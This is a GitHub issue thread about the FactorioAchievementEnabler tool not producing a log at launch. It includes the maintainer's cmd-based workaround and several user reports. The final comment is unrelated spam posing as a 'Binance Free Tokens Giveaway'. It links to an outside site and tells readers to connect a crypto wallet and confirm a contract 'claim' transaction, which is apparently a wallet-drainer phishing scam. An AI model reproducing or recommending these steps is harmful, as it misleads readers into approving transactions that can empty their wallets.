### ISSUE TITLE
The log isn't created upon launch

### ISSUE THREAD

**Issue by ccandour** [oorzkws/FactorioAchievementEnabler#11]
The enabler is not working and I'm unable to provide a log because there isn't one

![image](https://github.com/oorzkws/FactorioAchievementEnabler/assets/103199955/67d5b58b-0f2b-4829-ac15-c40be46096d6)

**Comment by candour0** [comment]
I have the launch option pasted in and my factorio version is latest stable

**Comment by candour0** [comment]
@oorzkws

**Comment by Twinki14** [comment]
I also don't see an output.log

**Comment by oorzkws** [comment]
In my testing, it worked in cmd but not in powershell. These are the steps I followed, let me know if it works.
![image](https://github.com/oorzkws/FactorioAchievementEnabler/assets/65210810/e2bde2ac-72ac-4216-841d-82966e4f498e)
```
cd /d X:\Path\To\Factorio\bin\x64
echo 427520 > steam_appid.txt
factorio.exe > out.txt
```

**Comment by Twinki14** [comment]
Same, it only works through cmd, not powershell

**Comment by ER-95** [comment]
@oorzkws My log is attached - is this still functional in the latest version of Factorio?
[output.log](https://github.com/oorzkws/FactorioAchievementEnabler/files/12703569/output.log)

**Comment by oorzkws** [comment]
@ER-95 It's still working for me, though it's been some time since I've actually hit any new achievements. Are you seeing any issues on your end? The log shows one more match than I expect, I'll have to go through the latest factorio version and see if they changed some internals.

**Comment by LennoxP90** [comment]
is there a way to get the log to produce when running from steam? I have everything set properly.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
